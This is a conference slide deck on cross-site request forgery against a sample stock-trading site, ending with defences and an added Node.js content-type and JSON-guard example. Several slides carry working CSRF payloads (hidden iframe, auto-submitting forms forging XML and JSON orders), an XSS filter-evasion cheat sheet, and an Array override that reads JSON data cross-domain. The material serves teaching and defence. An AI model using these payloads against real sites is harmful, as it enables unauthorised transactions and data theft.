[Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web
Shreeraj Shah
1.
Session J7 Demo
CSRF: The Biggest Little Vulnerability on the Web
2.
Who Am I?
http://shreeraj.blogspot.com
shreeraj@blueinfy.com
http://www.blueinfy.com
Founder & Director
- Blueinfy Solutions Pvt. Ltd. (Brief)
- SecurityExposure.com
Past experience – Net Square, Chase, IBM & Foundstone
Interest – Web security research
Published research
- Articles / Papers – Securityfocus, O'Reilly, DevX, InformIT etc.
- Tools – wsScanner, scanweb2.0, AppMap, AppCodeScan, AppPrint etc.
- Advisories – .Net, Java servers etc.
Books (Author)
- Web 2.0 Security – Defending Ajax, RIA and SOA
- Hacking Web Services
- Web Hacking
© Blueinfy Solutions Pvt. Ltd.
3.
Both real and possible
It can all happen while you are browsing, without your consent:
- Bank account transfer
- Buy call for stocks
- Password change on your email account
- Placing an order on your online auction site
- ....more....
4.
Myth...
- We have authentication in place
- We do proper session management
- We are over SSL and entertain just POST requests
- We use a secure browser
5.
How?
- All popular browsers can make cross domain calls
- Browsers replay cookies to the same domain
- The browser manages authentication as well
= CSRF
6.
Demo
Quick look at the case of a stock trading portal: adding stocks to a portfolio ☺
7.
Agenda
- State of Application Security and Role of CSRF
- CSRF Introduction and Cross Domain Calls
- CSRF attack
- CSRF and Web 2.0
- Defense against CSRF
- Conclusion
We will have concepts, examples and demos.
8.
Application Security State
CSRF on the rise
9.
Hacks & Attacks
10.
Attack vectors and types
Source: Web Application Security Consortium (WASC)
11.
Trends...
- Server side hacking is getting tougher with central defense
- Attacks on the client side – XSS and CSRF
- Helps in identity stealing
- Both exploits and frameworks are available
12.
CSRF – "Sleeping giant"
- "Sleeping giant is still a giant"
- Entered the OWASP Top 10 and Mitre Corp.'s Common Vulnerabilities and Exposures (CVE) list
- XSS and CSRF can be twin evils
- Having XSS, one gets CSRF for free anyway
- CSRF defense is difficult
13.
Real Cases and Attacks
14.
Web 2.0 – Adding fuel to the fire
- 80% of companies are investing in Web Services as part of their Web 2.0 initiative (McKinsey 2007 Global Survey)
- By the end of 2007, 30 percent of large companies have some kind of Web 2.0-based business initiative up and running. (Gartner)
- 2008: Web Services or Service-Oriented Architecture (SOA) would surge ahead. (Gartner)
15.
Root cause of Vulnerabilities
CSRF is somewhere in-between: Protocol? Browser? Programming?
CSI Security Survey, vulnerability distribution: programming errors 64%; misconfiguration and other problems 36%.
16.
CSRF – Basics
17.
CSRF
- Cross Site Request Forgery (CSRF), also known as XSRF
- Several other names for the same vector: "sea surf", session riding, one-click attack etc.
- The results are the same
18.
CSRF scenario (1)
The client sends a login request to the banking application (web app, web server, DB). The server authenticates the user and issues a session id: SESSID=190832mkidw.
19.
CSRF scenario (2)
The client requests the transaction page; the request carries SESSID=190832mkidw and the server completes the transaction on the strength of the session id.
20.
CSRF scenario (3)
The client browses to a malicious site and loads a page from it. The banking session (SESSID=190832mkidw) is still alive in the same browser.
21.
CSRF scenario (4)
The loaded page forces a request to the banking application's transaction page. The browser attaches SESSID=190832mkidw, and the server completes the transaction on the session id.
22.
Cross Domain Call
Why?
- Cross domain calls work
What about Same Origin Policy (SOP)? Is it a bypass of it?
- For CSRF success.
23.
Cross Domain Access and Same Origin Policy (SOP)
24.
Cross Domain
- Browser & cross domain access – an issue
- How to access cross domain information from the browser?
- Browsers follow the same origin policy. This policy protects the browser's users against security and privacy breaches.
- Ajax and RIA brought this issue to the front end
- It is important for them to access cross domain resources.
25.
Same Origin Policy
- The same origin policy is followed by all browsers
- The policy dates from Netscape Navigator 2.0.
- Two pages have the same origin if the protocol, port (if given), and host are the same for both pages.
- document.domain – DOM reference point
26.
Example
http://example.com/dir1/foo.asp
http://example.com/dir2/me.asp [Success]
https://example.com/cool.asp [Fail-protocol]
http://example.com:8080/foo.asp [Fail-port]
http://apple.com/ [Fail-host]
The origin check is done by comparing with document.domain – part of the DOM
27.
Should not work
The client logs in (user/pass) to the trading site trade.example.com, receives an authentication cookie and reaches the trading page. A news site (cnn.com) open in the same browser should not be able to reach the trading page (X).
28.
Request generation
IMG SRC: <img src="http://host/?command">
SCRIPT SRC: <script src="http://host/?command">
IFRAME SRC: <iframe src="http://host/?command">
29.
Request generation – 'Image' object
<script>
var foo = new Image();
foo.src = "http://host/?command";
</script>
30.
Request generation
- It is possible to generate POST as well
- A form can be built dynamically, and the button click can be triggered from JavaScript:
<script type="text/javascript" language="JavaScript">
document.foo.submit();
</script>
31.
CSRF Attack
32.
Attacking with CSRF
33.
Logging in
Request:
POST /trade/login.aspx HTTP/1.1
Host: trade.example.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.5) Gecko/20070713 Firefox/2.0.0.5
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://trade.example.com/trade/login.aspx
Content-Type: application/x-www-form-urlencoded
Content-Length: 34

user=rob&pass=iamrob&Submit=Submit

Response:
HTTP/1.x 200 OK
Date: Mon, 23 Jul 2007 04:10:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=mvoik245bzlfom55dxjsxoe1; path=/;
Cache-Control: private
Content-Type: text/html; charset=utf-8
34.
Placing an order
GET /trade/buy.aspx?symbol=MSFT&units=75&Submit=Submit HTTP/1.1
Host: trade.example.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.5) Gecko/20070713 Firefox/2.0.0.5
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://trade.example.com/trade/trade.html
Cookie: ASP.NET_SessionId=mvoik245bzlfom55dxjsxoe1
35.
Victim on another site
<html>
<head></head>
<body>
Welcome to our auction portal. We have some great products for which you can bid. <br>
Enjoy!
<iframe src='http://trade.example.com/trade/buy.aspx?symbol=GOOG&units=50' id='xsfr' name='CSRF' style="width:0px; height:0px; border: 0px"></iframe>
</body>
</html>

The request the browser sends when that page loads:
GET /trade/buy.aspx?symbol=GOOG&units=50 HTTP/1.1
Host: trade.example.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.5) Gecko/20070713 Firefox/2.0.0.5
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://CSRF.example.com/trade/CSRF.html
Cookie: ASP.NET_SessionId=x5r1a355eppt5k454kjmx245
36.
Victim with POST request
<FORM NAME="buy" action="./buy.aspx" METHOD="POST">
<input type="hidden" name="symbol" value="GOOG">
<input type="hidden" name="units" value="50">
</FORM>
<script>document.buy.submit();</script>

The resulting request:
POST /trade/buy.aspx HTTP/1.1
Host: trade.example.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://CSRF.example.com/trade/buy.html
Content-Type: application/x-www-form-urlencoded
Content-Length: 20

symbol=GOOG&units=50
37.
Obfuscation to bypass controls
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
38.
Obfuscation to bypass controls
<SCRIPT SRC=http://url/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=`javascript:alert("XSS")`>
Image tag malformed - <IMG """><SCRIPT>alert("XSS")</SCRIPT>">
39.
Obfuscation to bypass controls
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
Unicode encoding - <IMG SRC=javas cript: ;alert 0;'XSS')>
40. Obfuscation to bypass controls

UTF-8 -
<IMG SRC=ja 8asc� 000114ip 16:al&# 0000101rt� 040'XS& #0000083')>
41. Obfuscation to bypass controls

Hex -
<IMG SRC=javas&#x63ript:&#x61lert(&#x27XSS')>

XSS breakup -
<IMG SRC="jav ascript:alert('XSS');">
<IMG SRC="jav	ascript:alert('XSS');">
42. CSRF and Web 2.0
43. Web 2.0 and CSRF

• Web 2.0 applications can be vulnerable to different types of CSRF.
• The forged request can carry different structures.
• One needs to look at these as well.
44. Architecture
45. Architecture - Layers

Browser: HTML/CSS, JavaScript, DOM, Ajax, Flash / RIA, Widget
Structures: XML, JSON
Protocols: HTTP(S) carrying SOAP, XML-RPC, JSON-RPC, REST
Server-Side: Services, SaaS, Open APIs
46. Web 2.0 Changes Application Infrastructure

Vector                  | Web 1.0                                      | Web 2.0
Protocols               | HTTP & HTTPS                                 | SOAP, XML-RPC, REST etc. over HTTP & HTTPS
Information structures  | HTML transfer                                | XML, JSON, JS Objects etc.
Communication methods   | Synchronous; Postback; Refresh and Redirect  | Asynchronous & Cross domains (proxy)
Information sharing     | Single place (No urge for integration)       | Multiple sources (Urge for integrated information platform)
47. Ajax/RIA call

[Diagram] Asynchronous JavaScript and XML: the browser side (HTML / CSS / Flash, JS / DOM) issues an XMLHttpRequest (XHR), asynchronous over HTTP(S), to the Web Server, which fronts the Middleware and Database / Resource and returns XML / Text.
48. Web 2.0 Structures & Cross Domain Calls
49. Application Structures

• Ajax running with various different structures.
• Developers are adding various different calls and methods for it.
• JavaScript can talk with back end sources.
• Mashup applications talking with various sources.
• It has significant security impact.
• JSON, Array, JS-Object etc.
• Identifying and discovery of structures and CSRF.
50. CSRF with various streams

• JSON
• XML
• JS-Script
• JS-Object
• JS-Array
51. Addressing Cross Domain Calls – CSRF opening

• Cross Domain calls are very important for Web 2.0 applications.
  – Proxy to talk with cross domain
  – Callback implementation to fetch them
  – Flash via crossdomain.xml
• These are types of bypass and can have security implications.
• Source of the information – key!
52. Cross Domain with proxy
53. Callback Implementation

• Portals like yahoo and google are supporting this.
• Possible to bypass the SOP and make Cross Domain Calls
• Security at stake [Browser layer]
54. CSRF for 2.0
55. Cross Site Request Forgery (CSRF)

• What is different with Web 2.0
  – Is it possible to do CSRF to an XML stream?
  – How?
  – It will be a POST hitting the XML processing resources like Web Services
  – JSON CSRF is also possible
  – Interesting check to make against application and Web 2.0 resources
56. One Way CSRF Scenario
57. One Way CSRF Scenario
58. One Way CSRF Scenario
59. One Way CSRF Scenario
60. One-Way CSRF
61. One-Way CSRF

<html>
<body>
<FORM NAME="buy" ENCTYPE="text/plain" action="http://trade.example.com/xmlrpc/trade.rem" METHOD="POST">
<input type="hidden" name='<?xml version' value='"1.0"?><methodCall><methodName>stocks.buy</methodName><params><param><value><string>MSFT</string></value></param><param><value><double>26</double></value></param></params></methodCall>'>
</FORM>
<script>document.buy.submit();</script>
</body>
</html>
62. Forcing XML

• Splitting the XML stream across the form's name and value (text/plain encoding joins them with "=").
• Possible through XForms as well.
• A similar technique is applicable to JSON as well.
63. Similar with JSON

JSON structure the endpoint accepts:
{"symbol": "MSFT", "units": "20", "comment": "none"}

<FORM NAME="buy" ENCTYPE="text/plain" action="http://trade.example.com/trade/ajax-buy/buy.aspx" METHOD="POST">
<input type="hidden" name='{"symbol": "MSFT", "units": "20", "comment": "' value='no"}'>
</FORM>
<script>document.buy.submit();</script>

POST /trade/ajax-buy/buy.aspx HTTP/1.1
Host: trade.example.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://trade.example.com/trade/json-buy/json-CSRF.html
Content-Type: text/plain
Content-Length: 53

{"symbol": "MSFT", "units": "20", "comment": "=no"}
64. Two-Way CSRF

• One-Way – Just making a forceful request.
• Two-Way – Reading the data coming back from the target
  – May be getting hold of important information – profile, statements, numbers etc.
  – Is it possible with JSON/XML?
65. Two-Way CSRF
66. Two-Way CSRF
67. Two-Way CSRF

• Application is serving various streams like – JSON, JS-Object, Array etc.
68. Two-Way CSRF

An attacker page can make a cross domain request using SCRIPT (Firefox). The following code can overload the array stream:

// Replaces the global Array constructor so that an array literal loaded via
// <script> runs this function (older Firefox versions; current engines no
// longer call a user-defined Array for literals). The legacy "setter ="
// syntax hands each of the first four elements to spoof(), which forwards
// the value to send(), the attacker page's exfiltration routine (not shown on the slide).
function Array() {
  var obj = this;
  var index = 0;
  for (j = 0; j < 4; j++) {
    obj[index++] setter = spoof;
  }
}
function spoof(x) {
  send(x.toString());
}
69. Two-Way CSRF
70. Two-Way CSRF

• It is possible to overload these objects.
• Reading the data and sending it to a cross domain is possible.
• This opens up a two-way channel for an attacker.
• Web 2.0 streams are vulnerable to these attacks.
71. Scenario

[Diagram] A vulnerable JSON stream (a blog feed) comes through a proxy into the Web app (with its DB); the attacker posts malicious code to the site; the Web Server / Web app serves the JSON to the Web Client, which becomes the CSRF target.
72. Web 2.0 Components

• There are various other components of Web 2.0 applications
  – Can serve as CSRF payload
  – RSS feeds
  – Mashups
  – Widgets
  – Blogs
  – Flash based components
73. RSS feeds

• RSS feeds coming into the application from various untrusted sources.
• Feed readers are part of 2.0 applications.
• Vulnerable to XSS or CSRF.
• Malicious code can be executed in the browser.
• Several vulnerabilities reported.
74. RSS feeds
75. Mashups

• API exposure for the mashup supplier application.
• Cross domain access by callback may cause CSRF.
• The mashup application can be a man in the middle, so it either cannot be trusted or must be a trusted one.
76. Widgets/Gadgets

• The DOM sharing model can cause many security issues.
• One widget can change information on another widget – possible.
• CSRF injection through widget code.
77. Blogs

• Blogs are common to Web 2.0 applications.
• Many applications are plugging in third party blogs.
• One needs to check these blogs – CSRF is common with blogging applications.
78. Defense against CSRF
79. Unique tokens

• URL tokens – dynamically generated
• Form tokens – hidden

<input type="submit" class="submit" value="Login" />
<input type="hidden" name="formToken" value="d5cb8550af604bfb103dae89445fde69">
80. Captchas

• Can have image/text based captchas for important forms
• This will add protection against CSRFs
• Banking and financial applications can add several transaction ids for users
81. Referer check

• Checking the referrer to identify where requests are coming from
• Only requests from the same domain or from a specific resource should be entertained

Referer: http://www.google.com/
82. Session and Logout

• Client side – self defense
  – Logout after activities at the earliest
  – Do banking and other critical operations from a separate browser
  – Browse from a VM
• On the server side the session duration should be short
83. Web 2.0 Specific

• Server Side Checks
  – Check for the client's content-type.
  – XHR calls – xml/application.
  – Native calls – text/html.
  – Filtering is possible on it.
• Client Side Checks
  – Stream can be started and terminated by /* or any predefined characters.
  – Client can remove them before injecting into the DOM.
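The two Web 2.0 checks above, as an added Node.js example (not from the slides): the server refuses a JSON endpoint request whose Content-Type is not one the XMLHttpRequest client sends, and wraps its JSON response in /* ... */ so that a cross-domain <script> include sees only a comment (the Array overloading of the two-way CSRF slides then receives nothing), while the legitimate client strips the guard before parsing. The accepted content types and the order handling are assumptions.

```javascript
// Content types the application's own XHR client sends (assumption). HTML
// forms can only produce text/plain, application/x-www-form-urlencoded or
// multipart/form-data, so the auto-submitted forms from the one-way CSRF
// slides fail this check before the body is even parsed.
const XHR_CONTENT_TYPES = ['application/json', 'application/xml', 'text/xml'];

function requestContentTypeAllowed(headers) {
  const raw = headers['content-type'] || '';
  const mediaType = raw.split(';')[0].trim().toLowerCase(); // drop charset= etc.
  return XHR_CONTENT_TYPES.includes(mediaType);
}

// Wrap a JSON response in a block comment. Loaded via <script src=...> the
// body is a comment and executes nothing; a "*/" inside a string value is
// escaped as "*\/", which JSON.parse still reads back as "*/".
function wrapJsonStream(value) {
  const json = JSON.stringify(value).replace(/\*\//g, '*\\/');
  return '/*' + json + '*/';
}

// Legitimate client side: refuse anything without the guard, strip it, parse.
function unwrapJsonStream(body) {
  if (!body.startsWith('/*') || !body.endsWith('*/')) {
    throw new Error('stream guard missing');
  }
  return JSON.parse(body.slice(2, -2));
}

// Simulated handler for the slides' ajax-buy endpoint over a constructed request.
function handleBuyRequest(headers, body) {
  if (!requestContentTypeAllowed(headers)) {
    return { status: 415, body: '' }; // Unsupported Media Type
  }
  const order = JSON.parse(body);
  const result = { symbol: order.symbol, units: Number(order.units), status: 'queued' };
  return { status: 200, contentType: 'application/json', body: wrapJsonStream(result) };
}
```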
84. Warning

• Discussed countermeasures are not bullet proof but raise the bar
• There is no perfect security for CSRF – browsers are designed and work in a way that allows cross-site requests
• XSS on the site gives leverage for CSRF – No XSS!
85. Conclusion

• CSRF is indeed a sleeping giant
• Understanding is important, and countermeasures need to be put in at code level
• No foolproof defense is available, but there are ways to protect applications or parts of applications
• Web 2.0 – adds a new dimension to CSRF
86. Questions

http://shreeraj.blogspot.com
shreeraj@blueinfy.com
http://www.blueinfy.com